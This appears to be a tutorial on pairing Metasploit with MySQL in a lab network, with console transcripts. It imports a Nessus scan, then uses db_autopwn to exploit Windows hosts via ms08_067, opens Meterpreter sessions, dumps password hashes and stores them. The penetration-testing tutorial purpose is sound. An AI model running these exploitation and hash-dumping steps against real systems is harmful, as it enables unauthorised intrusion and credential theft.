Until the release of BackTrack 4 r2, it was possible to get Metasploit working with MYSQL but it was not an altogether seamless experience. Now, however, Metasploit and MYSQL work together “out of the box” so we thought it would be great to highlight the integration. With the Metasploit team moving away from sqlite3, it is vital to be able to make use of a properly threaded database. There have also been quite a number of additional database commands added to Metasploit and documentation tends to be rather sparse online when it comes to the less “glamorous” side of database management.
root@bt:~# msfconsole
=[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ ----=[635 exploits - 316 auxiliary
+ ----=[215 payloads - 27 encoders - 8 nops
=[svn r11078 updated today (2010.11.19)
msf > db_driver
[*] Active Driver: postgresql
[*] Available: postgresql, mysql, sqlite3
We then load the mysql driver, start the mysql service and connect to the database. If the database does not already exist, Metasploit will create it for us.
msf > db_driver mysql
[*] Using database driver mysql
msf >/etc/init.d/mysql start
[*]exec: /etc/init.d/mysql start
Starting MySQL database server: mysqld.
Checking for corrupt, not cleanly closed and upgrade needing tables..
msf > db_connect
[*] Usage: db_connect @/
[*] OR: db_connect -y[path/to/database.yml]
[*] Examples:
[*] db_connect user@metasploit3
[*] db_connect user:pass@192.168.0.2/metasploit3
[*] db_connect user:pass@192.168.0.2:1500/metasploit3
msf > db_connect root:toor@127.0.0.1/msf3
In order to have some hosts to use as targets and to show the information we can add to the database, we import a previously run Nessus scan using the db_import command. Metasploit will automatically detect the filetype and import it for us.
msf > db_import /root/nessus_report_EDB.nessus
[*] Importing 'Nessus XML (v2)' data
[*] Importing host 192.168.69.50
[*] Importing host 192.168.69.199
[*] Importing host 192.168.69.175
[*] Importing host 192.168.69.173
[*] Importing host 192.168.69.171
[*] Importing host 192.168.69.146
[*] Importing host 192.168.69.143
[*] Importing host 192.168.69.142
[*] Importing host 192.168.69.141
[*] Importing host 192.168.69.140
[*] Importing host 192.168.69.130
[*] Importing host 192.168.69.110
[*] Importing host 192.168.69.105
[*] Importing host 192.168.69.100
[*] Successfully imported /root/nessus_report_EDB.nessus
After the successful import, our database should be populated with a number of hosts. Running db_hosts will query the database and allow us to customize the output.
msf > db_hosts -h
Usage: db_hosts [-h|--help][-u|--up][-a ][-c
][-o output-file ]
-a Search for a list of addresses
-c
Only show the given columns
-h,--help Show this help information
-u,--up Only show hosts which are up
-o Send output to a filein csv format
Available columns: address, address6, arch, comm, comments, created_at, info, mac, name, os_flavor, os_lang, os_name, os_sp, purpose, state, updated_at
msf > db_hosts -c address,mac
Hosts
=====
address mac
------- ---
192.168.69.100 00:0C:29:DE:1A:00
192.168.69.105 00:0C:29:9A:FC:E0
192.168.69.110 00:0C:29:69:9C:44
192.168.69.130 00:0C:29:6E:26:BB
192.168.69.140
192.168.69.141 00:0C:29:F3:40:70
192.168.69.142 00:0C:29:57:63:E2
192.168.69.143 00:0C:29:32:29:79
192.168.69.146
192.168.69.171 00:0C:29:EC:23:47
192.168.69.173 00:0C:29:45:7D:33
192.168.69.175 00:0C:29:BB:38:53
192.168.69.199 00:0C:29:58:09:DA
192.168.69.50
Far more interesting than IP and MAC addresses are what services are running on our target systems which is what db_services will show us.
msf > db_services -h
Usage: db_services [-h|--help][-u|--up][-a ][-r
][-p
][-n ]
-a Search for a list of addresses
-c
Only show the given columns
-h,--help Show this help information
-n Search for a list of service names
-p
Search for a list of ports
-r
Only show [tcp|udp] services
-u,--up Only show services which are up
Available columns: created_at, info, name, port, proto, state, updated_at
msf > db_services -c name,port,proto
Services
========
name port proto Host Workspace
---- ---- ----- ---- ---------
192.168.69.100 123 udp 192.168.69.100 default
192.168.69.100 135 tcp 192.168.69.100 default
192.168.69.100 137 udp 192.168.69.100 default
192.168.69.100 139 tcp 192.168.69.100 default
192.168.69.100 445 tcp 192.168.69.100 default
192.168.69.100 3389 tcp 192.168.69.100 default
192.168.69.105 123 udp 192.168.69.105 default
...snip...
Most interesting of all is the list of vulnerabilities that are mapped to our specific targets as found in the vulnerability scan. The db_vulns command will list the vulnerabilities along with their corresponding reference numbers, if applicable.
msf > db_vulns
[*] Time: Sat Nov 2020:21:37 UTC 2010 Vuln: host=192.168.69.50 name=NSS- refs=
[*] Time: Sat Nov 2020:21:39 UTC 2010 Vuln: host=192.168.69.50 port=445proto=tcp name=NSS-26920refs=CVE-1999-0519,CVE-1999-0520,CVE-2002-1117,BID-494,OSVDB-299
[*] Time: Sat Nov 2020:21:39 UTC 2010 Vuln: host=192.168.69.50 port=445proto=tcp name=NSS-26919refs=CVE-1999-0505
...snip...
For the sake of brevity, we will just let db_autopwn exploit the low-hanging fruit for us and only run exploits with at least a “good” rating.
msf > db_autopwn -h
[*] Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port (default)
-q Disable exploit module output
-R [rank] Only run modules with a minimal rank
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
-PI[range] Only exploit hosts with these ports open
-PX[range] Always exclude hosts with these ports open
-m [regex] Only run modules whose name matches the regex
-T [secs] Maximum runtime for any exploit in seconds
msf > db_autopwn -x-e-R good
[*](1/30[0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.69.175:139...
[*](2/30[0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.69.175:139...
...snip...
[*] Meterpreter session 1 opened (192.168.69.140:54342 -> 192.168.69.105:34160) at Sat Nov 2015:45:24-05002010
[*] Meterpreter session 2 opened (192.168.69.140:53895 -> 192.168.69.100:30423) at Sat Nov 2015:45:24-05002010
[*](30/30[2 sessions]): Waiting on 2 launched modules to finish execution...
[*](30/30[2 sessions]): Waiting on 0 launched modules to finish execution...
In a brief amount of time, Metasploit has delivered 2 Meterpreter sessions to us.
msf > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 192.168.69.140:54342 -> 192.168.69.105:34160
2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ V-XPSP2-TEMPLAT 192.168.69.140:53895 -> 192.168.69.100:30423
Running db_exploited now will list not only the hosts that were exploited but also the port and exploit that was successful against them.
msf > db_exploited
[*] Time: Sat Nov 2020:45:24 UTC 2010 Host Info: host=192.168.69.105 port=445proto=tcp sname=192.168.69.105 exploit=exploit/windows/smb/ms08_067_netapi
[*] Time: Sat Nov 2020:45:24 UTC 2010 Host Info: host=192.168.69.100 port=445proto=tcp sname=192.168.69.100 exploit=exploit/windows/smb/ms08_067_netapi
[*] Found 2 exploited hosts.
Post exploitation is critical and you can frequently make use of credentials gathered to penetrate deeper into a target network. Metasploit has the db_add_cred command that allows you to insert credentials into the database as you come across them during your engagement.
msf > sessions -i1
[*] Starting interaction with 1...
meterpreter > hashdump
Administrator:500:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:616bd5bd6c74fb1e2207c34e6ce1c14f:fc631be480c73a749c15e311b8b877fd:::
lab:1003:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:adc54aedfc47352ef9e20da3dd86ca63:::
meterpreter >
Background session 1? [y/N]
msf > db_add_cred 192.168.69.105 445 Administrator Administrator:500:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e:::
[*] Time: Sat Nov 2020:54:36 UTC 2010 Credential: host=192.168.69.105 port=445proto=tcp sname=192.168.69.105 type=password user=Administrator pass=Administrator:500:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e::: active=true
msf > db_creds
[*] Time: Sat Nov 2020:54:36 UTC 2010 Credential: host=192.168.69.105 port=445proto=tcp sname=192.168.69.105 type=password user=Administrator pass=Administrator:500:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e::: active=true
[*] Found 1 credential.
msf >
All of these database features are very powerful and exciting but just as exciting is that your entire session is now available with MYSQL.
root@bt:~# mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands endwith;or \g.
Your MySQL connection id is56
Server version: 5.0.67-0ubuntu6 (Ubuntu)
Type'help;'or'\h' for help. Type'\c'to clear the buffer.
mysql>use msf3;
Reading table information for completion of tableandcolumn names
You can turn off this feature to get a quicker startup with-A
Database changed
mysql>showtables;
+-----------------------------+
| Tables_in_msf3 |
+-----------------------------+
| attachments |
| attachments_email_templates |
| campaigns |
| clients |
| creds |
| email_addresses |
| email_templates |
| events |
| exploited_hosts |
| hosts |
| imported_creds |
| loots |
| notes |
| project_members |
| refs |
| report_templates |
| reports |
| schema_migrations |
| services |
| tasks |
| users |
| vulns |
| vulns_refs |
| web_forms |
| web_pages |
| web_sites |
| web_templates |
| web_vulns |
| wmap_requests |
| wmap_targets |
| workspaces |
+-----------------------------+
31 rows inset(0.00 sec)
We can now perform queries to access all of the information gathered on exploited hosts, gathered credentials, and much more.
mysql>select*from exploited_hosts;
+----+---------+------------+--------------+-------------------------------------+--------------------------------------+---------------------+---------------------+
| id | host_id | service_id | session_uuid | name | payload | created_at | updated_at |
+----+---------+------------+--------------+-------------------------------------+--------------------------------------+---------------------+---------------------+
| 1| 14| 131| oc5vd2zl | exploit/windows/smb/ms08_067_netapi | payload/windows/meterpreter/bind_tcp |2010-11-2020:45:24|2010-11-2020:45:24|
| 2| 15| 137| qwtwtqfj | exploit/windows/smb/ms08_067_netapi | payload/windows/meterpreter/bind_tcp |2010-11-2020:45:24|2010-11-2020:45:24|
+----+---------+------------+--------------+-------------------------------------+--------------------------------------+---------------------+---------------------+
2 rows inset(0.00 sec)
mysql>select*from creds;
+----+------------+---------------------+---------------------+---------------+----------------------------------------------------------------------------------------+--------+-------+----------+-----------+-------------+
| id | service_id | created_at | updated_at |user | pass | active | proof | ptype | source_id | source_type |
+----+------------+---------------------+---------------------+---------------+----------------------------------------------------------------------------------------+--------+-------+----------+-----------+-------------+
| 1| 131|2010-11-2020:54:36|2010-11-2020:54:36| Administrator | Administrator:500:7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e::: | 1|NULL |password| NULL|NULL |
+----+------------+---------------------+---------------------+---------------+----------------------------------------------------------------------------------------+--------+-------+----------+-----------+-------------+
1 rows inset(0.00 sec)
mysql>
At first glance, database integration is not that compelling but it opens the door for the community to develop customized reporting apps using such a widely used database like MYSQL easing the post-penetration test reporting burden.
For further details on setting up and using the various databases in Metasploit, check out the Configuring Databases and Using the MSF Database sections in Metasploit Unleashed.